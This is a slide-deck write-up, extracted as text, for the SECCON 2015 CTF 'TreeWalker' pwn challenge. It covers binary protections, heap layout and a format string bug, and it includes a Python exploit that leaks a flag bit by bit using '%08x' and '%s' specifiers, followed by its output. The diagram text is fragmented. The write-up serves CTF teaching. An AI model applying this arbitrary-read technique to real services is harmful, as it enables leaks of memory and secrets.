fsb: treewalker - seccon 2015 online ctf
TRANSCRIPT
FSB: TreeWalkerExploit 200 points - SECCON 2015 Online CTF you0708@YOKARO-MON
treewalker.pwn.seccon.jp 20000
Surface Analysis
• ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, not stripped
• Arch: amd64-64-little
• RELRO: No RELRO
• Stack: No canary found
• NX: NX enabled
• PIE: No PIE
• FORTIFY: Enabled
Dynamic Analysis
# ./treewalker0000000000c69010ABCDEFGHIJKLMNvulnserver.c(77): Invalid input# IJKLMNbash: IJKLMN: command not found#
Address?
Read only 8 bytesRead only 8 bytes
Static Analysis
• Main function
The address given by the program is related
to flag?
• construct_tree
Static Analysis
Static Analysis
• construct_tree
Leaf
Flag = 0x49
0
Child
0 1
Leaf
Flag = 0x49
Child
0
Leaf
Flag = 0x4C
0
0
Static Analysis
• construct_tree0 1
LeafLeaf
LeafLeafLeaf
LeafLeaf
Leaf
01
01
00
01
F
Leaf End
Static Analysis
• Main function
1. First 8 bytes of input data are “size”
2. Show input data by ___printf_chk
Static Analysis
0x0000000000000004 hoge
hoge
flag address
Loop
Vulnerability
• FSB = Format String Bug0000000000602010
00000078f7b175c000000b40ffffcff00000000000000078cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc78383025
After sending “%08x” * 30
“%08x”
Exploit
Understanding Heap Layout
• Heap chunksChunk size + PREV_INUSE Flag = 0x49
0 or Address of child
Information Leakage
• Using format string bug
Leaf
Flag = 0x49
0
Child
Leaf
Flag = 0x49
Child
0
Leaf
Flag = 0x49
Child
0
zero or not
0x49 or 0x4C
…
Given address
Given address +0x18 (size of leaf)
+0x08 (size of chunk header)
Given address + 0x40
zero or not
0x49 or 0x4C
zero or not
0x49 or 0x4C
exploit.pyflag = ""flag_next = ""while flag_next != "L": c = 0 for i in range(8): c = c << 1 buf = '%08x' * 32 buf += ' !%s! ' buf += ' !%s! ' buf += pQ(addr) buf += pQ(addr + 8) f.write(pQ(len(buf)) + buf) read_until(f, ' !') flag_next = read_until(f, '! ')[:-3] read_until(f, ' !') child = read_until(f, '! ')[:-3] if flag_next == 'L': break if child: bit = 1 else: bit = 0 print bit, c += bit addr += 0x20 else: print "" flag += chr(c)print("[*] flag: %s" % flag)
python exploit.py[*] addr: 00000000006020100 1 0 1 0 0 1 1 0 1 0 0 0 1 0 1 0 1 0 0 0 0 1 1 0 1 0 0 0 0 1 1 0 1 0 0 1 1 1 1 0 1 0 0 1 1 1 0 0 1 1 1 1 0 1 1 0 0 1 1 0 1 0 0 0 1 1 1 0 0 1 0 0 1 1 0 0 0 1 0 0 0 1 1 0 0 0 1 0 0 1 1 0 1 1 1 0 1 0 1 0 0 1 0 0 1 0 0 0 0 0 0 0 1 1 1 0 0 1 0 0 1 0 1 1 0 0 1 0 1 0 1 0 0 1 0 0 1 1 0 0 1 0 1 0 1 0 0 0 0 0 1 0 1 1 0 0 1 0 0 0 1 1 1 1 1 0 1 [*] flag: SECCON{4rb17R@rYReAd}
Thank you!